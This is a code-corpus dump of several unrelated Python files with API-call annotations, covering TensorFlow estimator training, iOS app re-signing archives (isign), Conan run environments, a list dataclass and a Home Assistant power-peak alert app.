    :param eval_fn_dict : dictionary containing params for eval input_fn
    :param model_dir : directory to store the trained model
    """
    # 1. Create optimizer and compile model if optimizer is None
    if (optimizer is None):
        optimizer = tf.keras.optimizers.SGD(
            lr=1e-3, decay=1e-5, momentum=0.9, nesterov=True)

    # 2. compile the model
    model.compile(
        optimizer=optimizer,
        loss='categorical_crossentropy',
        metrics=['accuracy'])

    # 3. create estimator
    dir_path = os.path.join(os.getcwd(), model_dir)
    print("Model path chosen : ", dir_path)
    if (not os.path.exists(dir_path)):
        os.mkdir(dir_path)

    print("Creating estimator...")
    est = tf.keras.estimator.model_to_estimator(
        keras_model=model, model_dir=dir_path)

    # 4. Train and Evaluate the model
    print("Training...")
    # training spec
    train_spec = tf.estimator.TrainSpec(input_fn=lambda: input_func(input_func_dict),
                                        max_steps=500)
    # evaluation spec
    eval_spec = tf.estimator.EvalSpec(input_fn=lambda: input_func(eval_func_dict))

    # Run the training
    model_est = tf.estimator.train_and_evaluate(est, train_spec, eval_spec)

    #est.train(input_fn=lambda: input_func(input_func_dict),
    #          steps=None)
    #
    #est.evalute(input_fn=lambda: input_func(eval_func_dict))

    return est
[((25, 16, 26, 51), 'tensorflow.keras.estimator.model_to_estimator', 'tf.keras.estimator.model_to_estimator', (), '', True, 'import tensorflow as tf\n'), ((87, 10, 88, 50), 'tensorflow.keras.estimator.model_to_estimator', 'tf.keras.estimator.model_to_estimator', (), '', True, 'import tensorflow as tf\n'), ((101, 16, 101, 75), 'tensorflow.estimator.train_and_evaluate', 'tf.estimator.train_and_evaluate', ({(101, 48, 101, 51): 'est', (101, 53, 101, 63): 'train_spec', (101, 65, 101, 74): 'eval_spec'}, {}), '(est, train_spec, eval_spec)', True, 'import tensorflow as tf\n'), ((16, 20, 17, 67), 'tensorflow.keras.estimators.SGD', 'tf.keras.estimators.SGD', (), '', True, 'import tensorflow as tf\n'), ((72, 20, 73, 65), 'tensorflow.keras.optimizers.SGD', 'tf.keras.optimizers.SGD', (), '', True, 'import tensorflow as tf\n'), ((81, 28, 81, 39), 'os.getcwd', 'os.getcwd', ({}, {}), '()', False, 'import os\n'), ((83, 12, 83, 36), 'os.path.exists', 'os.path.exists', ({(83, 27, 83, 35): 'dir_path'}, {}), '(dir_path)', False, 'import os\n'), ((84, 8, 84, 26), 'os.mkdir', 'os.mkdir', ({(84, 17, 84, 25): 'dir_path'}, {}), '(dir_path)', False, 'import os\n')]
l0ui3/isign
isign/archive.py
c0730ac1ce1b32defe8c6016e19b9701184b0f5a
""" Represents an app archive. This is an app at rest, whether it's a naked app bundle in a directory, or a zipped app bundle, or an IPA. We have a common interface to extract these apps to a temp file, then resign them, and create an archive of the same type """ import abc import biplist from bundle import App, Bundle, is_info_plist_native from exceptions import MissingHelpers, NotSignable, NotMatched from distutils import spawn import logging import os from os.path import abspath, dirname, exists, isdir, isfile, join, normpath import tempfile import re from subprocess import call from signer import Signer import shutil import zipfile REMOVE_WATCHKIT = True helper_paths = {} log = logging.getLogger(__name__) def get_helper(helper_name): """ find paths to executables. Cached in helper_paths """ if helper_name not in helper_paths or helper_paths[helper_name] is None: # note, find_executable returns None is not found # in other words, we keep retrying until found helper_paths[helper_name] = spawn.find_executable(helper_name) log.debug("got executable {} for {}".format(helper_paths[helper_name], helper_name)) return helper_paths[helper_name] def make_temp_dir(): return tempfile.mkdtemp(prefix="isign-") def get_watchkit_paths(root_bundle_path): """ collect sub-bundles of this bundle that have watchkit """ # typical structure: # # app_bundle # ... # some_directory # watchkit_extension <-- this is the watchkit bundle # Info.plist # watchkit_bundle <-- this is the part that runs on the Watch # Info.plist <-- WKWatchKitApp=True # watchkit_paths = [] for path, _, _ in os.walk(root_bundle_path): if path == root_bundle_path: continue try: bundle = Bundle(path) except NotMatched: # this directory is not a bundle continue if bundle.info.get('WKWatchKitApp') is True: # get the *containing* bundle watchkit_paths.append(dirname(path)) return watchkit_paths def process_watchkit(root_bundle_path, should_remove=False): """ Unfortunately, we currently can't sign WatchKit. If you don't care about watchkit functionality, it is generally harmless to remove it, so that's the default. Remove when https://github.com/saucelabs/isign/issues/20 is fixed """ watchkit_paths = get_watchkit_paths(root_bundle_path) if len(watchkit_paths) > 0: if should_remove: for path in watchkit_paths: log.warning("Removing WatchKit bundle {}".format(path)) shutil.rmtree(path) else: raise NotSignable("Cannot yet sign WatchKit bundles") class Archive(object): __metaclass__ = abc.ABCMeta # we use abc.abstractmethod throughout because there are certain class # methods we want to ensure are implemented. @abc.abstractmethod def unarchive_to_temp(self): """ Unarchive and copy to a temp directory """ pass @abc.abstractmethod def archive(cls, path, output_path): """ Archive a directory to an output path """ pass @abc.abstractmethod def get_info(cls, path): """ Obtain app metadata from Info.plist without unarchiving """ pass @abc.abstractmethod def precheck(cls, path): """ Check if this is, in fact, an archive of this type """ pass @abc.abstractmethod def find_bundle_dir(cls, path): """ Locate the directory of the main app (aka bundle) """ pass class AppArchive(Archive): """ The simplest form of archive -- a naked App Bundle, with no extra directory structure, compression, etc """ @classmethod def find_bundle_dir(cls, path): """ Included for similarity with the zipped archive classes. 
In this case, the bundle dir *is* the directory """ return path @classmethod def _get_plist_path(cls, path): return join(cls.find_bundle_dir(path), "Info.plist") @classmethod def get_info(cls, path): return biplist.readPlist(cls._get_plist_path(path)) @classmethod def precheck(cls, path): if not isdir(path): return False if not os.path.exists(cls._get_plist_path(path)): return False plist = cls.get_info(path) is_native = is_info_plist_native(plist) log.debug("is_native: {}".format(is_native)) return is_native @classmethod def archive(cls, path, output_path): if exists(output_path): shutil.rmtree(output_path) shutil.move(path, output_path) log.info("archived %s to %s" % (cls.__name__, output_path)) def __init__(self, path): self.path = path self.relative_bundle_dir = '.' self.bundle_info = self.get_info(self.path) def unarchive_to_temp(self): containing_dir = make_temp_dir() log.debug("unarchiving to temp... %s -> %s", self.path, containing_dir) shutil.rmtree(containing_dir) # quirk of copytree, top dir can't exist already shutil.copytree(self.path, containing_dir) process_watchkit(containing_dir, REMOVE_WATCHKIT) return UncompressedArchive(containing_dir, '.', self.__class__) class AppZipArchive(Archive): """ Just like an app, except it's zipped up, and when repackaged, should be re-zipped. """ app_dir_pattern = r'^([^/]+\.app/).*$' extensions = ['.zip'] helpers = ['zip', 'unzip'] @classmethod def is_helpers_present(cls): """ returns False if any of our helper apps wasn't found in class init """ is_present = True for helper_name in cls.helpers: if get_helper(helper_name) is None: log.error("missing helper for class {}: {}".format(cls.__name__, helper_name)) is_present = False break return is_present @classmethod def is_archive_extension_match(cls, path): """ does this path have the right extension """ log.debug('extension match') for extension in cls.extensions: log.debug('extension match: %s', extension) if path.endswith(extension): return True return False @classmethod def find_bundle_dir(cls, zipfile_obj): relative_bundle_dir = None apps = set() file_list = zipfile_obj.namelist() for file_name in file_list: matched = re.match(cls.app_dir_pattern, file_name) if matched: apps.add(matched.group(1)) if len(apps) == 1: log.debug("found one app") relative_bundle_dir = apps.pop() elif len(apps) > 1: log.warning('more than one app found in archive') else: log.warning('no apps found in archive') return relative_bundle_dir @classmethod def _get_plist_path(cls, relative_bundle_dir): return join(relative_bundle_dir, "Info.plist") @classmethod def precheck(cls, path): """ Checks if an archive looks like this kind of app. Have to examine within the zipfile, b/c we don't want to make temp dirs just yet. 
This recapitulates a very similar precheck in the Bundle class """ if not isfile(path): return False if not cls.is_helpers_present(): raise MissingHelpers("helpers not present") is_native = False log.debug('precheck') log.debug('path: %s', path) if (cls.is_archive_extension_match(path) and zipfile.is_zipfile(path)): log.debug("this is an archive, and a zipfile") zipfile_obj = zipfile.ZipFile(path) relative_bundle_dir = cls.find_bundle_dir(zipfile_obj) if relative_bundle_dir is not None: plist_path = cls._get_plist_path(relative_bundle_dir) if plist_path not in zipfile_obj.namelist(): return False plist = cls.get_info(relative_bundle_dir, zipfile_obj) is_native = is_info_plist_native(plist) log.debug("is_native: {}".format(is_native)) return is_native @classmethod def get_info(cls, relative_bundle_dir, zipfile_obj): plist_path = cls._get_plist_path(relative_bundle_dir) plist_bytes = zipfile_obj.read(plist_path) return biplist.readPlistFromString(plist_bytes) def __init__(self, path): self.path = path zipfile_obj = zipfile.ZipFile(path) self.relative_bundle_dir = self.find_bundle_dir(zipfile_obj) self.bundle_info = self.get_info(self.relative_bundle_dir, zipfile_obj) def unarchive_to_temp(self): containing_dir = make_temp_dir() call([get_helper('unzip'), "-qu", self.path, "-d", containing_dir]) app_dir = abspath(join(containing_dir, self.relative_bundle_dir)) process_watchkit(app_dir, REMOVE_WATCHKIT) return UncompressedArchive(containing_dir, self.relative_bundle_dir, self.__class__) @classmethod def archive(cls, containing_dir, output_path): """ archive this up into a zipfile. Note this is a classmethod, because the caller will use us on a temp directory somewhere """ # the temp file is necessary because zip always adds ".zip" if it # does not have an extension. But we want to respect the desired # output_path's extension, which could be ".ipa" or who knows. # So we move it to the output_path later. # # We also do a little dance with making another temp directory just # to construct the zip file. This is the best way to ensure the an unused # filename. Also, `zip` won't overwrite existing files, so this is safer. temp_zip_dir = None try: # need to chdir and use relative paths, because zip is stupid temp_zip_dir = tempfile.mkdtemp(prefix="isign-zip-") temp_zip_file = join(temp_zip_dir, 'temp.zip') call([get_helper('zip'), "-qr", temp_zip_file, "."], cwd=containing_dir) shutil.move(temp_zip_file, output_path) log.info("archived %s to %s" % (cls.__name__, output_path)) finally: if temp_zip_dir is not None and isdir(temp_zip_dir): shutil.rmtree(temp_zip_dir) class IpaArchive(AppZipArchive): """ IPA is Apple's standard for distributing apps. Much like an AppZip, but slightly different paths """ extensions = ['.ipa'] app_dir_pattern = r'^(Payload/[^/]+\.app/).*$' class UncompressedArchive(object): """ This just keeps track of some state with an unzipped app archive and how to re-zip it back up once re-signed. The bundle is located somewhere inside the containing directory, but might be a few directories down, like in a ContainingDir/Payload/something.app This class is also useful if you have an app that's already unzipped and you want to sign it. """ def __init__(self, path, relative_bundle_dir, archive_class): """ Path is the "Containing dir", the dir at the root level of the unzipped archive (or the dir itself, in the case of an AppArchive archive) relative bundle dir is the dir containing the bundle, e.g. Payload/Foo.app archive class is the kind of archive this was (Ipa, etc.) 
""" self.path = path self.relative_bundle_dir = relative_bundle_dir self.archive_class = archive_class bundle_path = normpath(join(path, relative_bundle_dir)) self.bundle = App(bundle_path) def archive(self, output_path): """ Re-zip this back up, or simply copy it out, depending on what the original archive class did """ self.archive_class.archive(self.path, output_path) def clone(self, target_path): """ Copy the uncompressed archive somewhere else, return initialized UncompressedArchive """ shutil.copytree(self.path, target_path) return self.__class__(target_path, self.relative_bundle_dir, self.archive_class) def remove(self): # the containing dir might be gone already b/c AppArchive simply moves # it to the desired target when done if exists(self.path) and isdir(self.path): log.debug('removing ua: %s', self.path) shutil.rmtree(self.path) def archive_factory(path): """ Guess what kind of archive we are dealing with, return an archive object. Returns None if path did not match any archive type """ archive = None for cls in [IpaArchive, AppZipArchive, AppArchive]: if cls.precheck(path): archive = cls(path) log.debug("File %s matched as %s", path, cls.__name__) break return archive def view(input_path): if not exists(input_path): raise IOError("{0} not found".format(input_path)) ua = None bundle_info = None try: archive = archive_factory(input_path) if archive is None: raise NotMatched('No matching archive type found') ua = archive.unarchive_to_temp() bundle_info = ua.bundle.info finally: if ua is not None: ua.remove() return bundle_info def resign(input_path, certificate, key, apple_cert, provisioning_profile, output_path, info_props=None, alternate_entitlements_path=None): """ Unified interface to extract any kind of archive from a temporary file, resign it with these credentials, and create a similar archive for that resigned app """ if not exists(input_path): raise IOError("{0} not found".format(input_path)) log.debug('Signing with apple_cert: {}'.format(apple_cert)) log.debug('Signing with key: {}'.format(key)) log.debug('Signing with certificate: {}'.format(certificate)) log.debug('Signing with provisioning_profile: {}'.format(provisioning_profile)) signer = Signer(signer_cert_file=certificate, signer_key_file=key, apple_cert_file=apple_cert) ua = None bundle_info = None try: archive = archive_factory(input_path) if archive is None: raise NotSignable('No matching archive type found') ua = archive.unarchive_to_temp() if info_props: # Override info.plist props of the parent bundle ua.bundle.update_info_props(info_props) ua.bundle.resign(signer, provisioning_profile, alternate_entitlements_path) bundle_info = ua.bundle.info ua.archive(output_path) except NotSignable as e: msg = "Not signable: <{0}>: {1}\n".format(input_path, e) log.info(msg) raise finally: if ua is not None: ua.remove() return bundle_info
[((24, 6, 24, 33), 'logging.getLogger', 'logging.getLogger', ({(24, 24, 24, 32): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((39, 11, 39, 44), 'tempfile.mkdtemp', 'tempfile.mkdtemp', (), '', False, 'import tempfile\n'), ((55, 22, 55, 47), 'os.walk', 'os.walk', ({(55, 30, 55, 46): 'root_bundle_path'}, {}), '(root_bundle_path)', False, 'import os\n'), ((382, 13, 384, 47), 'signer.Signer', 'Signer', (), '', False, 'from signer import Signer\n'), ((32, 36, 32, 70), 'distutils.spawn.find_executable', 'spawn.find_executable', ({(32, 58, 32, 69): 'helper_name'}, {}), '(helper_name)', False, 'from distutils import spawn\n'), ((140, 20, 140, 47), 'bundle.is_info_plist_native', 'is_info_plist_native', ({(140, 41, 140, 46): 'plist'}, {}), '(plist)', False, 'from bundle import App, Bundle, is_info_plist_native\n'), ((146, 11, 146, 30), 'os.path.exists', 'exists', ({(146, 18, 146, 29): 'output_path'}, {}), '(output_path)', False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((148, 8, 148, 38), 'shutil.move', 'shutil.move', ({(148, 20, 148, 24): 'path', (148, 26, 148, 37): 'output_path'}, {}), '(path, output_path)', False, 'import shutil\n'), ((159, 8, 159, 37), 'shutil.rmtree', 'shutil.rmtree', ({(159, 22, 159, 36): 'containing_dir'}, {}), '(containing_dir)', False, 'import shutil\n'), ((160, 8, 160, 50), 'shutil.copytree', 'shutil.copytree', ({(160, 24, 160, 33): 'self.path', (160, 35, 160, 49): 'containing_dir'}, {}), '(self.path, containing_dir)', False, 'import shutil\n'), ((213, 15, 213, 54), 'os.path.join', 'join', ({(213, 20, 213, 39): 'relative_bundle_dir', (213, 41, 213, 53): '"""Info.plist"""'}, {}), "(relative_bundle_dir, 'Info.plist')", False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((245, 15, 245, 55), 'biplist.readPlistFromString', 'biplist.readPlistFromString', ({(245, 43, 245, 54): 'plist_bytes'}, {}), '(plist_bytes)', False, 'import biplist\n'), ((249, 22, 249, 43), 'zipfile.ZipFile', 'zipfile.ZipFile', ({(249, 38, 249, 42): 'path'}, {}), '(path)', False, 'import zipfile\n'), ((310, 22, 310, 38), 'bundle.App', 'App', ({(310, 26, 310, 37): 'bundle_path'}, {}), '(bundle_path)', False, 'from bundle import App, Bundle, is_info_plist_native\n'), ((320, 8, 320, 47), 'shutil.copytree', 'shutil.copytree', ({(320, 24, 320, 33): 'self.path', (320, 35, 320, 46): 'target_path'}, {}), '(self.path, target_path)', False, 'import shutil\n'), ((346, 11, 346, 29), 'os.path.exists', 'exists', ({(346, 18, 346, 28): 'input_path'}, {}), '(input_path)', False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((374, 11, 374, 29), 'os.path.exists', 'exists', ({(374, 18, 374, 28): 'input_path'}, {}), '(input_path)', False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((59, 21, 59, 33), 'bundle.Bundle', 'Bundle', ({(59, 28, 59, 32): 'path'}, {}), '(path)', False, 'from bundle import App, Bundle, is_info_plist_native\n'), ((81, 18, 81, 65), 'exceptions.NotSignable', 'NotSignable', ({(81, 30, 81, 64): '"""Cannot yet sign WatchKit bundles"""'}, {}), "('Cannot yet sign WatchKit bundles')", False, 'from exceptions import MissingHelpers, NotSignable, NotMatched\n'), ((135, 15, 135, 26), 'os.path.isdir', 'isdir', ({(135, 21, 135, 25): 'path'}, {}), '(path)', False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((147, 12, 147, 38), 'shutil.rmtree', 'shutil.rmtree', ({(147, 26, 147, 37): 'output_path'}, {}), 
'(output_path)', False, 'import shutil\n'), ((199, 22, 199, 62), 're.match', 're.match', ({(199, 31, 199, 50): 'cls.app_dir_pattern', (199, 52, 199, 61): 'file_name'}, {}), '(cls.app_dir_pattern, file_name)', False, 'import re\n'), ((220, 15, 220, 27), 'os.path.isfile', 'isfile', ({(220, 22, 220, 26): 'path'}, {}), '(path)', False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((223, 18, 223, 55), 'exceptions.MissingHelpers', 'MissingHelpers', ({(223, 33, 223, 54): '"""helpers not present"""'}, {}), "('helpers not present')", False, 'from exceptions import MissingHelpers, NotSignable, NotMatched\n'), ((228, 16, 228, 40), 'zipfile.is_zipfile', 'zipfile.is_zipfile', ({(228, 35, 228, 39): 'path'}, {}), '(path)', False, 'import zipfile\n'), ((230, 26, 230, 47), 'zipfile.ZipFile', 'zipfile.ZipFile', ({(230, 42, 230, 46): 'path'}, {}), '(path)', False, 'import zipfile\n'), ((257, 26, 257, 72), 'os.path.join', 'join', ({(257, 31, 257, 45): 'containing_dir', (257, 47, 257, 71): 'self.relative_bundle_dir'}, {}), '(containing_dir, self.relative_bundle_dir)', False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((276, 27, 276, 64), 'tempfile.mkdtemp', 'tempfile.mkdtemp', (), '', False, 'import tempfile\n'), ((277, 28, 277, 58), 'os.path.join', 'join', ({(277, 33, 277, 45): 'temp_zip_dir', (277, 47, 277, 57): '"""temp.zip"""'}, {}), "(temp_zip_dir, 'temp.zip')", False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((279, 12, 279, 51), 'shutil.move', 'shutil.move', ({(279, 24, 279, 37): 'temp_zip_file', (279, 39, 279, 50): 'output_path'}, {}), '(temp_zip_file, output_path)', False, 'import shutil\n'), ((309, 31, 309, 62), 'os.path.join', 'join', ({(309, 36, 309, 40): 'path', (309, 42, 309, 61): 'relative_bundle_dir'}, {}), '(path, relative_bundle_dir)', False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((328, 11, 328, 28), 'os.path.exists', 'exists', ({(328, 18, 328, 27): 'self.path'}, {}), '(self.path)', False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((328, 33, 328, 49), 'os.path.isdir', 'isdir', ({(328, 39, 328, 48): 'self.path'}, {}), '(self.path)', False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((330, 12, 330, 36), 'shutil.rmtree', 'shutil.rmtree', ({(330, 26, 330, 35): 'self.path'}, {}), '(self.path)', False, 'import shutil\n'), ((353, 18, 353, 62), 'exceptions.NotMatched', 'NotMatched', ({(353, 29, 353, 61): '"""No matching archive type found"""'}, {}), "('No matching archive type found')", False, 'from exceptions import MissingHelpers, NotSignable, NotMatched\n'), ((391, 18, 391, 63), 'exceptions.NotSignable', 'NotSignable', ({(391, 30, 391, 62): '"""No matching archive type found"""'}, {}), "('No matching archive type found')", False, 'from exceptions import MissingHelpers, NotSignable, NotMatched\n'), ((65, 34, 65, 47), 'os.path.dirname', 'dirname', ({(65, 42, 65, 46): 'path'}, {}), '(path)', False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((79, 16, 79, 35), 'shutil.rmtree', 'shutil.rmtree', ({(79, 30, 79, 34): 'path'}, {}), '(path)', False, 'import shutil\n'), ((237, 28, 237, 55), 'bundle.is_info_plist_native', 'is_info_plist_native', ({(237, 49, 237, 54): 'plist'}, {}), '(plist)', False, 'from bundle import App, Bundle, is_info_plist_native\n'), ((282, 44, 282, 63), 'os.path.isdir', 'isdir', ({(282, 50, 282, 62): 
'temp_zip_dir'}, {}), '(temp_zip_dir)', False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((283, 16, 283, 43), 'shutil.rmtree', 'shutil.rmtree', ({(283, 30, 283, 42): 'temp_zip_dir'}, {}), '(temp_zip_dir)', False, 'import shutil\n')]
dscole/conan
conan/tools/env/virtualrunenv.py
ff7b8e6703e8407773968517d68424b9ec59aa30
from conan.tools.env import Environment


def runenv_from_cpp_info(conanfile, cpp_info):
    """ return an Environment deducing the runtime information from a cpp_info
    """
    dyn_runenv = Environment(conanfile)
    if cpp_info is None:  # This happens when the dependency is a private one = BINARY_SKIP
        return dyn_runenv
    if cpp_info.bin_paths:  # cpp_info.exes is not defined yet
        dyn_runenv.prepend_path("PATH", cpp_info.bin_paths)
    # If it is a build_require this will be the build-os, otherwise it will be the host-os
    if cpp_info.lib_paths:
        dyn_runenv.prepend_path("LD_LIBRARY_PATH", cpp_info.lib_paths)
        dyn_runenv.prepend_path("DYLD_LIBRARY_PATH", cpp_info.lib_paths)
    if cpp_info.framework_paths:
        dyn_runenv.prepend_path("DYLD_FRAMEWORK_PATH", cpp_info.framework_paths)
    return dyn_runenv


class VirtualRunEnv:
    """ captures the conanfile environment that is defined from its dependencies,
    and also from profiles
    """

    def __init__(self, conanfile):
        self._conanfile = conanfile

    def environment(self):
        """ collects the runtime information from dependencies. For normal libraries
        should be very occasional
        """
        runenv = Environment(self._conanfile)
        # FIXME: Missing profile info
        # FIXME: Cache value?
        host_req = self._conanfile.dependencies.host
        test_req = self._conanfile.dependencies.test
        for _, dep in list(host_req.items()) + list(test_req.items()):
            if dep.runenv_info:
                runenv.compose_env(dep.runenv_info)
            runenv.compose_env(runenv_from_cpp_info(self._conanfile, dep.cpp_info))
        return runenv

    def generate(self, auto_activate=False):
        run_env = self.environment()
        if run_env:
            run_env.save_script("conanrunenv", auto_activate=auto_activate)
[((7, 17, 7, 39), 'conan.tools.env.Environment', 'Environment', ({(7, 29, 7, 38): 'conanfile'}, {}), '(conanfile)', False, 'from conan.tools.env import Environment\n'), ((33, 17, 33, 45), 'conan.tools.env.Environment', 'Environment', ({(33, 29, 33, 44): 'self._conanfile'}, {}), '(self._conanfile)', False, 'from conan.tools.env import Environment\n')]
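A minimal, hypothetical sketch of how a recipe might invoke this generator from its generate() method. The ConanFile import path, the package names, and the auto_activate flag mirror the development-era API shown above and may differ in released Conan versions.

from conans import ConanFile  # import path assumed for this era of Conan
from conan.tools.env.virtualrunenv import VirtualRunEnv


class PkgConan(ConanFile):
    name = "pkg"
    requires = "zlib/1.2.11"  # illustrative dependency only

    def generate(self):
        # Collect the runtime environment (PATH, LD_LIBRARY_PATH, ...) from the
        # dependency graph and write the launcher script, as VirtualRunEnv.generate()
        # does above.
        runenv = VirtualRunEnv(self)
        runenv.generate(auto_activate=False)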
rrickgauer/lists
src/api/api_lists/models/list.py
371de6af332789ef386392fd24857702794d05a6
""" ********************************************************************************** List model ********************************************************************************** """ from enum import Enum from dataclasses import dataclass from uuid import UUID from datetime import datetime class ListType(str, Enum): LIST : str = 'list' TEMPLATE: str = 'template' @classmethod def _missing_(cls, value): return ListType.LIST @dataclass class List: id : UUID = None user_id : UUID = None name : str = None created_on: datetime = None type : ListType = ListType.LIST
[]
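A small sketch (not part of the module above) showing how the _missing_ hook makes unknown enum values fall back to ListType.LIST; the import path is assumed from the repo layout, and the field values are illustrative.

from uuid import uuid4
from datetime import datetime

from api_lists.models.list import List, ListType  # import path assumed

# Known values resolve normally; unknown values hit _missing_ and fall back to LIST.
assert ListType('template') is ListType.TEMPLATE
assert ListType('no-such-type') is ListType.LIST

example = List(id=uuid4(), user_id=uuid4(), name="groceries",
               created_on=datetime.utcnow(), type=ListType('no-such-type'))
print(example.type)  # ListType.LIST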
azogue/hassio_config
config/appdaemon/apps/power_alarm.py
591f158794c173d6391179ab2f52348d58c49aad
# -*- coding: utf-8 -*- """ Automation task as a AppDaemon App for Home Assistant - current meter PEAK POWER notifications """ import datetime as dt from enum import IntEnum import appdaemon.plugins.hass.hassapi as hass LOG_LEVEL = "INFO" LOG_LEVEL_ALERT = "WARNING" LOGGER = "special_event_log" COEF_CRITICAL_LIMIT = 1.1 # 10% over limit MIN_TIME_TURN_OFF_AC = 60 # secs # Big power consumers BIG_CONSUMER_1_CLIMATE = "switch.ac_dry_contact" BIG_CONSUMER_1_LABEL = "aire acondicionado" BIG_CONSUMER_2 = "switch.calentador" BIG_CONSUMER_2_LABEL = "calentador" _IOS_SOUND_POWER_PEAK = "US-EN-Morgan-Freeman-Vacate-The-Premises.wav" class TypeNotif(IntEnum): """ Handler for different kinds of power notifications. Used to centralize push message construction. """ ALERT_OFF = 0 ALERT_ON = 1 ALERT_CRITICAL = 2 def make_ios_push_data(self, data_msg: dict) -> dict: if self.value == self.ALERT_CRITICAL: push_data = { "category": "powerpeak", "badge": 10, "sound": _IOS_SOUND_POWER_PEAK, "critical": 1, "volume": 1.0, "thread-id": "power-peak-group", } elif self.value == self.ALERT_ON: push_data = { "category": "powerpeak", "thread-id": "power-peak-group", "badge": 1, "critical": 1, "sound": _IOS_SOUND_POWER_PEAK, } else: push_data = { "category": "confirm", "thread-id": "power-peak-group", "sound": _IOS_SOUND_POWER_PEAK, "badge": 0, } data_msg["data"] = {"push": push_data} return data_msg def make_telegram_push_data(self, data_msg: dict, target: int) -> dict: data_msg["target"] = target data_msg["disable_notification"] = self.value == self.ALERT_OFF data_msg["inline_keyboard"] = [ [("Luces ON", "/luceson"), ("Luces OFF", "/lucesoff")], [ ("Potencia eléctrica", "/enerpi"), ("Grafs. enerPI", "/enerpitiles"), ], [ ( "Calentador OFF", "/service_call switch/turn_off switch.calentador", ), ( "AC OFF", "/service_call switch/turn_off switch.ac_dry_contact", ), ], ] return data_msg def make_notification_message( self, current_peak, last_trigger, alarm_start, devices_off="", pow_instant=0.0, pow_sustained=0.0, ) -> dict: if self.value == self.ALERT_CRITICAL: return { "title": "¡El automático está a punto de saltar!", "message": ( f"Apagando {devices_off} para intentar evitar " "la sobrecarga eléctrica." ), } time_now = ( "{:%H:%M:%S}".format(last_trigger) if last_trigger is not None else "???" ) if self.value == self.ALERT_ON: data_msg = { "title": "Alto consumo eléctrico!", "message": ( f"Peak: {current_peak} W en {time_now}. " f"Ahora {pow_instant} W ({pow_sustained} sostenidos)" ), } data_msg["message"] = data_msg["message"].format( current_peak, time_now, pow_instant, pow_sustained ) else: duration_min = ( dt.datetime.now() - alarm_start ).total_seconds() / 60.0 data_msg = { "title": "Consumo eléctrico: Normal", "message": ( f"Potencia normal desde {time_now}, " f"Pico de potencia: {current_peak} W. " f"Alerta iniciada hace {duration_min:.1f} min." ), } return data_msg # noinspection PyClassHasNoInit class PeakNotifier(hass.Hass): """ App to notify power peaks (when they are greater than a certain limit), and after that, notify when back to normal (< lower limit). 
""" # Limit Values _max_peak: float _upper_limit: float _lower_limit: float _min_time_high: int _min_time_low: int # App user inputs _main_power: str _main_power_peak: str _notifier: str _target_sensor: str _alarm_state: bool = False _critical_alarm_state: bool = False _last_trigger = None _alarm_start = None _turn_off_measure_taken = False _current_peak = 0 def initialize(self): """AppDaemon required method for app init.""" self._main_power = self.args.get("sustained_power") self._main_power_peak = self.args.get("instant_power") self._notifier = self.config.get("notifier").replace(".", "/") self._target_sensor = self.config.get("chatid_sensor") # Power limits self._upper_limit = float(self.args.get("max_power_kw")) * 1000.0 self._lower_limit = float(self.args.get("max_power_kw_reset")) * 1000.0 self._min_time_high = int(self.args.get("min_time_high")) self._min_time_low = int(self.args.get("min_time_low")) # TODO implement _max_peak over _instant_power self._max_peak = float(self.args.get("max_power_peak_kw")) * 1000.0 # Listen for Main Power changes: self.listen_state(self.main_power_change, self._main_power) self.log( f"PeakNotifier Initialized. P={self._main_power}, " f"with P>{self._upper_limit} W for {self._min_time_high} secs, " f"(low={self._lower_limit} W for {self._min_time_low} secs). " f"Notify: {self._notifier}.", level=LOG_LEVEL, log=LOGGER, ) def notify_alert(self, type_notif: TypeNotif, data: dict): ios_alarm_msg = type_notif.make_ios_push_data(data.copy()) tlg_alarm_msg = type_notif.make_telegram_push_data( data.copy(), target=int(self.get_state(self._target_sensor)), ) self.call_service(self._notifier, **ios_alarm_msg) self.call_service("telegram_bot/send_message", **tlg_alarm_msg) # noinspection PyUnusedLocal def peak_power_change(self, entity, attribute, old, new, kwargs): """Power Peak ALARM logic control.""" try: new = int(float(new)) except ValueError: return # Update peak if new > self._upper_limit and new > self._current_peak: self._current_peak = new # noinspection PyUnusedLocal def main_power_change(self, entity, attribute, old, new, kwargs): """Sustained Power ALARM logic control.""" try: new = int(float(new)) except ValueError: return now = dt.datetime.now() if not self._alarm_state and (new > self._upper_limit): if new > self._current_peak: self._current_peak = new # Pre-Alarm state, before trigger if self._last_trigger is None: # Start power peak event self.log( "New power peak event at {} with P={} W".format(now, new), level=LOG_LEVEL, log=LOGGER, ) self._last_trigger = now elif ( now - self._last_trigger ).total_seconds() > self._min_time_high: # TRIGGER ALARM self._alarm_start = now self._turn_off_measure_taken = False type_notif = TypeNotif.ALERT_ON data = type_notif.make_notification_message( self._current_peak, self._last_trigger, self._alarm_start, pow_instant=self.get_state(self._main_power_peak), pow_sustained=new, ) self.log( f"TRIGGER ALARM with msg={data}", level=LOG_LEVEL_ALERT, log=LOGGER, ) self.notify_alert(type_notif, data) self._alarm_state = True self._critical_alarm_state = False self._last_trigger = now # else: # wait some more time # (this is the same power peak event, # waiting min time to trigger alarm) # pass elif self._alarm_state: # Alarm state, waiting for reset if new > self._current_peak: self._current_peak = new if ( not self._turn_off_measure_taken and new > self._upper_limit * COEF_CRITICAL_LIMIT ): self.log( "ENABLE CRITICAL ALARM with {} W".format(new), level=LOG_LEVEL_ALERT, log=LOGGER, ) self._critical_alarm_state = True 
